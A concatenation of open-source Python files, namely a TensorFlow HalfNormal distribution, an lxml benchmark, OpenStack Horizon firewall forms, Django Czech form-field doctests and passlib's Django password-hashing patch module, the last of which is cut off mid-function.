# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Half Normal distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import special_math
__all__ = [
"HalfNormal",
]
class HalfNormal(distribution.Distribution):
"""The Half Normal distribution with scale `scale`.
#### Mathematical details
The half normal is a transformation of a centered normal distribution.
If some random variable `X` has normal distribution,
```none
X ~ Normal(0.0, scale)
Y = |X|
```
Then `Y` will have half normal distribution. The probability density
function (pdf) is:
```none
pdf(x; scale, x > 0) = sqrt(2) / (scale * sqrt(pi)) *
exp(- 1/2 * (x / scale) ** 2)
)
```
Where `scale = sigma` is the standard deviation of the underlying normal
distribution.
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar HalfNormal distribution.
dist = tf.contrib.distributions.HalfNormal(scale=3.0)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued HalfNormals.
# The first has scale 11.0, the second 22.0
dist = tf.contrib.distributions.HalfNormal(scale=[11.0, 22.0])
# Evaluate the pdf of the first distribution on 1.0, and the second on 1.5,
# returning a length two tensor.
dist.prob([1.0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
"""
def __init__(self,
scale,
validate_args=False,
allow_nan_stats=True,
name="HalfNormal"):
"""Construct HalfNormals with scale `scale`.
Args:
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value "`NaN`" to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[scale]):
with ops.control_dependencies([check_ops.assert_positive(scale)] if
validate_args else []):
self._scale = array_ops.identity(scale, name="scale")
super(HalfNormal, self).__init__(
dtype=self._scale.dtype,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._scale],
name=name)
@staticmethod
def _param_shapes(sample_shape):
return {"scale": ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)}
@property
def scale(self):
"""Distribution parameter for the scale."""
return self._scale
def _batch_shape_tensor(self):
return array_ops.shape(self.scale)
def _batch_shape(self):
return self.scale.shape
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
sampled = random_ops.random_normal(
shape=shape, mean=0., stddev=1., dtype=self.dtype, seed=seed)
return math_ops.abs(sampled * self.scale)
def _prob(self, x):
coeff = np.sqrt(2) / self.scale / np.sqrt(np.pi)
pdf = coeff * math_ops.exp(- 0.5 * (x / self.scale) ** 2)
return pdf * math_ops.cast(x >= 0, self.dtype)
def _cdf(self, x):
truncated_x = nn.relu(x)
return math_ops.erf(truncated_x / self.scale / np.sqrt(2.0))
def _entropy(self):
return 0.5 * math_ops.log(np.pi * self.scale ** 2.0 / 2.0) + 0.5
def _mean(self):
return self.scale * np.sqrt(2.0) / np.sqrt(np.pi)
def _quantile(self, p):
return np.sqrt(2.0) * self.scale * special_math.erfinv(p)
def _mode(self):
return array_ops.zeros(self.batch_shape_tensor())
def _variance(self):
return self.scale ** 2.0 * (1.0 - 2.0 / np.pi)
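# Illustrative sanity check (not part of the library; assumes a TF 1.x runtime
# where this class is exported as tf.contrib.distributions.HalfNormal):
#
#   dist = tf.contrib.distributions.HalfNormal(scale=2.0)
#   with tf.Session() as sess:
#     mean, var = sess.run([dist.mean(), dist.variance()])
#   # mean == 2.0 * sqrt(2 / pi) ~= 1.5958
#   # var  == 4.0 * (1.0 - 2.0 / pi) ~= 1.4535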
| Mistobaan/tensorflow | tensorflow/contrib/distributions/python/ops/half_normal.py | Python | apache-2.0 | 5,678 |
import sys, copy
from itertools import *
import benchbase
from benchbase import (with_attributes, with_text, onlylib,
serialized, children, nochange)
############################################################
# Benchmarks
############################################################
class BenchMark(benchbase.TreeBenchMark):
repeat100 = range(100)
repeat1000 = range(1000)
repeat3000 = range(3000)
def __init__(self, lib):
from lxml import etree, objectify
self.objectify = objectify
parser = etree.XMLParser(remove_blank_text=True)
lookup = objectify.ObjectifyElementClassLookup()
parser.setElementClassLookup(lookup)
super(BenchMark, self).__init__(etree, parser)
@nochange
def bench_attribute(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz
def bench_attribute_assign_int(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = 5
def bench_attribute_assign_string(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = "5"
@nochange
def bench_attribute_cached(self, root):
"1 2 4"
cache = root.zzzzz
for i in self.repeat3000:
root.zzzzz
@nochange
def bench_attributes_deep(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_attributes_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_objectpath(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@with_text(text=True, utext=True, no_text=True)
def bench_annotate(self, root):
self.objectify.annotate(root)
@nochange
def bench_descendantpaths(self, root):
root.descendantpaths()
@nochange
@with_text(text=True)
def bench_type_inference(self, root):
"1 2 4"
el = root.aaaaa
for i in self.repeat1000:
el.getchildren()
@nochange
@with_text(text=True)
def bench_type_inference_annotated(self, root):
"1 2 4"
el = root.aaaaa
self.objectify.annotate(el)
for i in self.repeat1000:
el.getchildren()
@nochange
@children
def bench_elementmaker(self, children):
E = self.objectify.E
for child in children:
root = E.this(
"test",
E.will(
E.do("nothing"),
E.special,
)
)
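# Convention note (based on how benchbase consumes these methods): the short
# docstrings such as "1 2 4" appear to select which prebuilt benchmark trees a
# method is timed against, while decorators like @nochange and @with_text set
# up tree variants and mark benchmarks that leave the tree unmodified.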
if __name__ == '__main__':
benchbase.main(BenchMark)
| mhnatiuk/phd_sociology_of_religion | scrapper/build/lxml/benchmark/bench_objectify.py | Python | gpl-2.0 | 3,322 |
# Copyright 2013, Big Switch Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import validators
from openstack_dashboard import api
port_validator = validators.validate_port_or_colon_separated_port_range
LOG = logging.getLogger(__name__)
class UpdateRule(forms.SelfHandlingForm):
name = forms.CharField(max_length=80, label=_("Name"), required=False)
description = forms.CharField(
required=False,
max_length=80, label=_("Description"))
protocol = forms.ChoiceField(
label=_("Protocol"), required=False,
choices=[('TCP', _('TCP')), ('UDP', _('UDP')), ('ICMP', _('ICMP')),
('ANY', _('ANY'))],
help_text=_('Protocol for the firewall rule'))
action = forms.ChoiceField(
label=_("Action"), required=False,
choices=[('ALLOW', _('ALLOW')), ('DENY', _('DENY'))],
help_text=_('Action for the firewall rule'))
source_ip_address = forms.IPField(
label=_("Source IP Address/Subnet"),
version=forms.IPv4 | forms.IPv6,
required=False, mask=True,
help_text=_('Source IP address or subnet'))
destination_ip_address = forms.IPField(
label=_('Destination IP Address/Subnet'),
version=forms.IPv4 | forms.IPv6,
required=False, mask=True,
help_text=_('Destination IP address or subnet'))
source_port = forms.CharField(
max_length=80,
label=_("Source Port/Port Range"),
required=False,
validators=[port_validator],
help_text=_('Source port (integer in [1, 65535] or range in a:b)'))
destination_port = forms.CharField(
max_length=80,
label=_("Destination Port/Port Range"),
required=False,
validators=[port_validator],
help_text=_('Destination port (integer in [1, 65535] or range'
' in a:b)'))
shared = forms.BooleanField(label=_("Shared"), required=False)
enabled = forms.BooleanField(label=_("Enabled"), required=False)
failure_url = 'horizon:project:firewalls:index'
def handle(self, request, context):
rule_id = self.initial['rule_id']
name_or_id = context.get('name') or rule_id
if context['protocol'] == 'ANY':
context['protocol'] = None
for f in ['source_ip_address', 'destination_ip_address',
'source_port', 'destination_port']:
if not context[f]:
context[f] = None
try:
rule = api.fwaas.rule_update(request, rule_id, **context)
msg = _('Rule %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return rule
except Exception as e:
msg = (_('Failed to update rule %(name)s: %(reason)s') %
{'name': name_or_id, 'reason': e})
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class UpdatePolicy(forms.SelfHandlingForm):
name = forms.CharField(max_length=80, label=_("Name"), required=False)
description = forms.CharField(required=False,
max_length=80, label=_("Description"))
shared = forms.BooleanField(label=_("Shared"), required=False)
audited = forms.BooleanField(label=_("Audited"), required=False)
failure_url = 'horizon:project:firewalls:index'
def handle(self, request, context):
policy_id = self.initial['policy_id']
name_or_id = context.get('name') or policy_id
try:
policy = api.fwaas.policy_update(request, policy_id, **context)
msg = _('Policy %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to update policy %(name)s: %(reason)s') % {
'name': name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class UpdateFirewall(forms.SelfHandlingForm):
name = forms.CharField(max_length=80,
label=_("Name"),
required=False)
description = forms.CharField(max_length=80,
label=_("Description"),
required=False)
firewall_policy_id = forms.ChoiceField(label=_("Policy"))
admin_state_up = forms.ChoiceField(choices=[(True, _('UP')),
(False, _('DOWN'))],
label=_("Admin State"))
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(UpdateFirewall, self).__init__(request, *args, **kwargs)
try:
tenant_id = self.request.user.tenant_id
policies = api.fwaas.policy_list_for_tenant(request, tenant_id)
policies = sorted(policies, key=lambda policy: policy.name)
except Exception:
exceptions.handle(request,
_('Unable to retrieve policy list.'))
policies = []
policy_id = kwargs['initial']['firewall_policy_id']
policy_name = [p.name for p in policies if p.id == policy_id][0]
firewall_policy_id_choices = [(policy_id, policy_name)]
for p in policies:
if p.id != policy_id:
firewall_policy_id_choices.append((p.id, p.name_or_id))
self.fields['firewall_policy_id'].choices = firewall_policy_id_choices
def handle(self, request, context):
firewall_id = self.initial['firewall_id']
name_or_id = context.get('name') or firewall_id
context['admin_state_up'] = (context['admin_state_up'] == 'True')
try:
firewall = api.fwaas.firewall_update(request, firewall_id,
**context)
msg = _('Firewall %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return firewall
except Exception as e:
msg = _('Failed to update firewall %(name)s: %(reason)s') % {
'name': name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class InsertRuleToPolicy(forms.SelfHandlingForm):
firewall_rule_id = forms.ChoiceField(label=_("Insert Rule"))
insert_before = forms.ChoiceField(label=_("Before"),
required=False)
insert_after = forms.ChoiceField(label=_("After"),
required=False)
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(InsertRuleToPolicy, self).__init__(request, *args, **kwargs)
try:
tenant_id = self.request.user.tenant_id
all_rules = api.fwaas.rule_list_for_tenant(request, tenant_id)
all_rules = sorted(all_rules, key=lambda rule: rule.name_or_id)
available_rules = [r for r in all_rules
if not r.firewall_policy_id]
current_rules = []
for r in kwargs['initial']['firewall_rules']:
r_obj = [rule for rule in all_rules if r == rule.id][0]
current_rules.append(r_obj)
available_choices = [(r.id, r.name_or_id) for r in available_rules]
current_choices = [(r.id, r.name_or_id) for r in current_rules]
except Exception as e:
msg = _('Failed to retrieve available rules: %s') % e
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
self.fields['firewall_rule_id'].choices = available_choices
self.fields['insert_before'].choices = [('', '')] + current_choices
self.fields['insert_after'].choices = [('', '')] + current_choices
def handle(self, request, context):
policy_id = self.initial['policy_id']
policy_name_or_id = self.initial['name'] or policy_id
try:
insert_rule_id = context['firewall_rule_id']
insert_rule = api.fwaas.rule_get(request, insert_rule_id)
body = {'firewall_rule_id': insert_rule_id,
'insert_before': context['insert_before'],
'insert_after': context['insert_after']}
policy = api.fwaas.policy_insert_rule(request, policy_id, **body)
msg = _('Rule %(rule)s was successfully inserted to policy '
'%(policy)s.') % {
'rule': insert_rule.name or insert_rule.id,
'policy': policy_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to insert rule to policy %(name)s: %(reason)s') % {
'name': policy_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class RemoveRuleFromPolicy(forms.SelfHandlingForm):
firewall_rule_id = forms.ChoiceField(label=_("Remove Rule"))
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(RemoveRuleFromPolicy, self).__init__(request, *args, **kwargs)
try:
tenant_id = request.user.tenant_id
all_rules = api.fwaas.rule_list_for_tenant(request, tenant_id)
current_rules = []
for r in kwargs['initial']['firewall_rules']:
r_obj = [rule for rule in all_rules if r == rule.id][0]
current_rules.append(r_obj)
current_choices = [(r.id, r.name_or_id) for r in current_rules]
except Exception as e:
msg = _('Failed to retrieve current rules in policy %(name)s: '
'%(reason)s') % {'name': self.initial['name'], 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
self.fields['firewall_rule_id'].choices = current_choices
def handle(self, request, context):
policy_id = self.initial['policy_id']
policy_name_or_id = self.initial['name'] or policy_id
try:
remove_rule_id = context['firewall_rule_id']
remove_rule = api.fwaas.rule_get(request, remove_rule_id)
body = {'firewall_rule_id': remove_rule_id}
policy = api.fwaas.policy_remove_rule(request, policy_id, **body)
msg = _('Rule %(rule)s was successfully removed from policy '
'%(policy)s.') % {
'rule': remove_rule.name or remove_rule.id,
'policy': policy_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to remove rule from policy %(name)s: '
'%(reason)s') % {'name': self.initial['name'],
'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class RouterInsertionFormBase(forms.SelfHandlingForm):
def __init__(self, request, *args, **kwargs):
super(RouterInsertionFormBase, self).__init__(request, *args, **kwargs)
try:
router_choices = self.get_router_choices(request, kwargs)
self.fields['router_ids'].choices = router_choices
except Exception as e:
msg = self.init_failure_msg % {'name': self.initial['name'],
'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
@abc.abstractmethod
def get_router_choices(self, request, kwargs):
"""Return a list of selectable routers."""
@abc.abstractmethod
def get_new_router_ids(self, context):
"""Return a new list of router IDs associated with the firewall."""
def handle(self, request, context):
firewall_id = self.initial['firewall_id']
firewall_name_or_id = self.initial['name'] or firewall_id
try:
body = {'router_ids': self.get_new_router_ids(context)}
firewall = api.fwaas.firewall_update(request, firewall_id, **body)
msg = self.success_msg % {'firewall': firewall_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return firewall
except Exception as e:
msg = self.failure_msg % {'name': firewall_name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
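# The concrete forms below supply the two abstract hooks: AddRouterToFirewall
# offers only routers not yet associated with a firewall and appends the
# selection to the firewall's existing router list, while
# RemoveRouterFromFirewall lists the currently associated routers and keeps
# only those left selected.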
class AddRouterToFirewall(RouterInsertionFormBase):
router_ids = forms.MultipleChoiceField(
label=_("Add Routers"),
required=False,
widget=forms.CheckboxSelectMultiple(),
help_text=_("Add selected router(s) to the firewall."))
failure_url = 'horizon:project:firewalls:index'
success_msg = _('Router(s) was/were successfully added to firewall '
'%(firewall)s.')
failure_msg = _('Failed to add router(s) to firewall %(name)s: %(reason)s')
init_failure_msg = _('Failed to retrieve available routers: %(reason)s')
def get_router_choices(self, request, kwargs):
tenant_id = self.request.user.tenant_id
routers_list = api.fwaas.firewall_unassociated_routers_list(
request, tenant_id)
return [(r.id, r.name_or_id) for r in routers_list]
def get_new_router_ids(self, context):
existing_router_ids = self.initial['router_ids']
add_router_ids = context['router_ids']
return add_router_ids + existing_router_ids
class RemoveRouterFromFirewall(RouterInsertionFormBase):
router_ids = forms.MultipleChoiceField(
label=_("Remove Routers"),
required=False,
widget=forms.CheckboxSelectMultiple(),
help_text=_("Unselect the router(s) to be removed from firewall."))
failure_url = 'horizon:project:firewalls:index'
success_msg = _('Router(s) was successfully removed from firewall '
'%(firewall)s.')
failure_msg = _('Failed to remove router(s) from firewall %(name)s: '
'%(reason)s')
init_failure_msg = _('Failed to retrieve current routers in firewall '
'%(name)s: %(reason)s')
def get_router_choices(self, request, kwargs):
tenant_id = self.request.user.tenant_id
all_routers = api.neutron.router_list(request, tenant_id=tenant_id)
current_routers = [r for r in all_routers
if r['id'] in kwargs['initial']['router_ids']]
return [(r.id, r.name_or_id) for r in current_routers]
def get_new_router_ids(self, context):
        # context['router_ids'] holds the router IDs to be kept.
return context['router_ids']
| wangxiangyu/horizon | openstack_dashboard/dashboards/project/firewalls/forms.py | Python | apache-2.0 | 16,187 |
# -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ CZ Form Fields
tests = r"""
# CZPostalCodeField #########################################################
>>> from django.contrib.localflavor.cz.forms import CZPostalCodeField
>>> f = CZPostalCodeField()
>>> f.clean('84545x')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('91909')
u'91909'
>>> f.clean('917 01')
u'91701'
>>> f.clean('12345')
u'12345'
>>> f.clean('123456')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('123 4')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
# CZRegionSelect ############################################################
>>> from django.contrib.localflavor.cz.forms import CZRegionSelect
>>> w = CZRegionSelect()
>>> w.render('regions', 'TT')
u'<select name="regions">\n<option value="PR">Prague</option>\n<option value="CE">Central Bohemian Region</option>\n<option value="SO">South Bohemian Region</option>\n<option value="PI">Pilsen Region</option>\n<option value="CA">Carlsbad Region</option>\n<option value="US">Usti Region</option>\n<option value="LB">Liberec Region</option>\n<option value="HK">Hradec Region</option>\n<option value="PA">Pardubice Region</option>\n<option value="VY">Vysocina Region</option>\n<option value="SM">South Moravian Region</option>\n<option value="OL">Olomouc Region</option>\n<option value="ZL">Zlin Region</option>\n<option value="MS">Moravian-Silesian Region</option>\n</select>'
# CZBirthNumberField ########################################################
>>> from django.contrib.localflavor.cz.forms import CZBirthNumberField
>>> f = CZBirthNumberField()
>>> f.clean('880523/1237')
u'880523/1237'
>>> f.clean('8805231237')
u'8805231237'
>>> f.clean('880523/000')
u'880523/000'
>>> f.clean('880523000')
u'880523000'
>>> f.clean('882101/0011')
u'882101/0011'
>>> f.clean('880523/1237', 'm')
u'880523/1237'
>>> f.clean('885523/1231', 'f')
u'885523/1231'
>>> f.clean('123456/12')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('123456/12345')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('12345612')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('12345612345')
Traceback (most recent call last):
...
ValidationError: [u'Enter a birth number in the format XXXXXX/XXXX or XXXXXXXXXX.']
>>> f.clean('881523/0000', 'm')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('885223/0000', 'm')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('881223/0000', 'f')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('886523/0000', 'f')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('880523/1239')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('8805231239')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
>>> f.clean('990101/0011')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid birth number.']
# CZICNumberField ########################################################
>>> from django.contrib.localflavor.cz.forms import CZICNumberField
>>> f = CZICNumberField()
>>> f.clean('12345679')
u'12345679'
>>> f.clean('12345601')
u'12345601'
>>> f.clean('12345661')
u'12345661'
>>> f.clean('12345610')
u'12345610'
>>> f.clean('1234567')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
>>> f.clean('12345660')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
>>> f.clean('12345600')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid IC number.']
"""
| Smarsh/django | tests/regressiontests/forms/localflavor/cz.py | Python | bsd-3-clause | 4,319 |
"""passlib.ext.django.models -- monkeypatch django hashing framework"""
#=============================================================================
# imports
#=============================================================================
# core
import logging; log = logging.getLogger(__name__)
from warnings import warn
# site
from django import VERSION
from django.conf import settings
# pkg
from passlib.context import CryptContext
from passlib.exc import ExpectedTypeError
from passlib.ext.django.utils import _PatchManager, hasher_to_passlib_name, \
get_passlib_hasher, get_preset_config
from passlib.utils.compat import callable, unicode, bytes
# local
__all__ = ["password_context"]
#=============================================================================
# global attrs
#=============================================================================
# the context object which this patches contrib.auth to use for password hashing.
# configuration controlled by ``settings.PASSLIB_CONFIG``.
password_context = CryptContext()
# function mapping User objects -> passlib user category.
# may be overridden via ``settings.PASSLIB_GET_CATEGORY``.
def _get_category(user):
"""default get_category() implementation"""
if user.is_superuser:
return "superuser"
elif user.is_staff:
return "staff"
else:
return None
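# Example override (illustrative only; a replacement just needs to map a User
# object to a category string understood by the loaded CryptContext, or None):
#
#   # in the project's settings.py (hypothetical)
#   PASSLIB_GET_CATEGORY = lambda user: "staff" if user.is_staff else None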
# object used to track state of patches applied to django.
_manager = _PatchManager(log=logging.getLogger(__name__ + "._manager"))
# patch status
_patched = False
#=============================================================================
# applying & removing the patches
#=============================================================================
def _apply_patch():
"""monkeypatch django's password handling to use ``passlib_context``,
assumes the caller will configure the object.
"""
#
# setup constants
#
log.debug("preparing to monkeypatch 'django.contrib.auth' ...")
global _patched
assert not _patched, "monkeypatching already applied"
HASHERS_PATH = "django.contrib.auth.hashers"
MODELS_PATH = "django.contrib.auth.models"
USER_PATH = MODELS_PATH + ":User"
FORMS_PATH = "django.contrib.auth.forms"
#
    # import UNUSABLE_PASSWORD and is_password_usable() helpers
# (providing stubs for older django versions)
#
if VERSION < (1,4):
has_hashers = False
if VERSION < (1,0):
UNUSABLE_PASSWORD = "!"
else:
from django.contrib.auth.models import UNUSABLE_PASSWORD
def is_password_usable(encoded):
return encoded is not None and encoded != UNUSABLE_PASSWORD
def is_valid_secret(secret):
return secret is not None
elif VERSION < (1,6):
has_hashers = True
from django.contrib.auth.hashers import UNUSABLE_PASSWORD, \
is_password_usable
# NOTE: 1.4 - 1.5 - empty passwords no longer valid.
def is_valid_secret(secret):
return bool(secret)
else:
has_hashers = True
from django.contrib.auth.hashers import is_password_usable
# 1.6 - empty passwords valid again
def is_valid_secret(secret):
return secret is not None
if VERSION < (1,6):
def make_unusable_password():
return UNUSABLE_PASSWORD
else:
from django.contrib.auth.hashers import make_password as _make_password
def make_unusable_password():
return _make_password(None)
# django 1.4.6+ uses a separate hasher for "sha1$$digest" hashes
has_unsalted_sha1 = (VERSION >= (1,4,6))
#
# backport ``User.set_unusable_password()`` for Django 0.9
# (simplifies rest of the code)
#
if not hasattr(_manager.getorig(USER_PATH), "set_unusable_password"):
assert VERSION < (1,0)
@_manager.monkeypatch(USER_PATH)
def set_unusable_password(user):
user.password = make_unusable_password()
@_manager.monkeypatch(USER_PATH)
def has_usable_password(user):
return is_password_usable(user.password)
#
# patch ``User.set_password() & ``User.check_password()`` to use
# context & get_category (would just leave these as wrappers for hashers
# module under django 1.4, but then we couldn't pass User object into
# get_category very easily)
#
@_manager.monkeypatch(USER_PATH)
def set_password(user, password):
"passlib replacement for User.set_password()"
if is_valid_secret(password):
# NOTE: pulls _get_category from module globals
cat = _get_category(user)
user.password = password_context.encrypt(password, category=cat)
else:
user.set_unusable_password()
@_manager.monkeypatch(USER_PATH)
def check_password(user, password):
"passlib replacement for User.check_password()"
hash = user.password
if not is_valid_secret(password) or not is_password_usable(hash):
return False
if not hash and VERSION < (1,4):
return False
# NOTE: pulls _get_category from module globals
cat = _get_category(user)
ok, new_hash = password_context.verify_and_update(password, hash,
category=cat)
if ok and new_hash is not None:
# migrate to new hash if needed.
user.password = new_hash
user.save()
return ok
#
# override check_password() with our own implementation
#
@_manager.monkeypatch(HASHERS_PATH, enable=has_hashers)
@_manager.monkeypatch(MODELS_PATH)
def check_password(password, encoded, setter=None, preferred="default"):
"passlib replacement for check_password()"
        # XXX: this currently ignores the "preferred" keyword, since its purpose
# was for hash migration, and that's handled by the context.
if not is_valid_secret(password) or not is_password_usable(encoded):
return False
ok = password_context.verify(password, encoded)
if ok and setter and password_context.needs_update(encoded):
setter(password)
return ok
#
# patch the other functions defined in the ``hashers`` module, as well
# as any other known locations where they're imported within ``contrib.auth``
#
if has_hashers:
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(MODELS_PATH)
def make_password(password, salt=None, hasher="default"):
"passlib replacement for make_password()"
if not is_valid_secret(password):
return make_unusable_password()
if hasher == "default":
scheme = None
else:
scheme = hasher_to_passlib_name(hasher)
kwds = dict(scheme=scheme)
handler = password_context.handler(scheme)
            # NOTE: django may specify an empty string for the salt,
            # even if the scheme doesn't accept a salt; we omit the
            # keyword in that case.
if salt is not None and (salt or 'salt' in handler.setting_kwds):
kwds['salt'] = salt
return password_context.encrypt(password, **kwds)
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(FORMS_PATH)
def get_hasher(algorithm="default"):
"passlib replacement for get_hasher()"
if algorithm == "default":
scheme = None
else:
scheme = hasher_to_passlib_name(algorithm)
# NOTE: resolving scheme -> handler instead of
# passing scheme into get_passlib_hasher(),
# in case context contains custom handler
# shadowing name of a builtin handler.
handler = password_context.handler(scheme)
return get_passlib_hasher(handler, algorithm=algorithm)
# identify_hasher() was added in django 1.5,
        # patching it anyway for 1.4, so passlib's version is always available.
@_manager.monkeypatch(HASHERS_PATH)
@_manager.monkeypatch(FORMS_PATH)
def identify_hasher(encoded):
"passlib helper to identify hasher from encoded password"
handler = password_context.identify(encoded, resolve=True,
required=True)
algorithm = None
if (has_unsalted_sha1 and handler.name == "django_salted_sha1" and
encoded.startswith("sha1$$")):
# django 1.4.6+ uses a separate hasher for "sha1$$digest" hashes,
# but passlib just reuses the "sha1$salt$digest" handler.
# we want to resolve to correct django hasher.
algorithm = "unsalted_sha1"
return get_passlib_hasher(handler, algorithm=algorithm)
_patched = True
log.debug("... finished monkeypatching django")
def _remove_patch():
"""undo the django monkeypatching done by this module.
offered as a last resort if it's ever needed.
.. warning::
This may cause problems if any other Django modules have imported
their own copies of the patched functions, though the patched
code has been designed to throw an error as soon as possible in
this case.
"""
global _patched
if _patched:
log.debug("removing django monkeypatching...")
_manager.unpatch_all(unpatch_conflicts=True)
password_context.load({})
_patched = False
log.debug("...finished removing django monkeypatching")
return True
if _manager: # pragma: no cover -- sanity check
log.warning("reverting partial monkeypatching of django...")
_manager.unpatch_all()
password_context.load({})
log.debug("...finished removing django monkeypatching")
return True
log.debug("django not monkeypatched")
return False
#=============================================================================
# main code
#=============================================================================
def _load():
global _get_category
# TODO: would like to add support for inheriting config from a preset
# (or from existing hasher state) and letting PASSLIB_CONFIG
# be an update, not a replacement.
# TODO: wrap and import any custom hashers as passlib handlers,
# so they could be used in the passlib config.
# load config from settings
_UNSET = object()
config = getattr(settings, "PASSLIB_CONFIG", _UNSET)
if config is _UNSET:
# XXX: should probably deprecate this alias
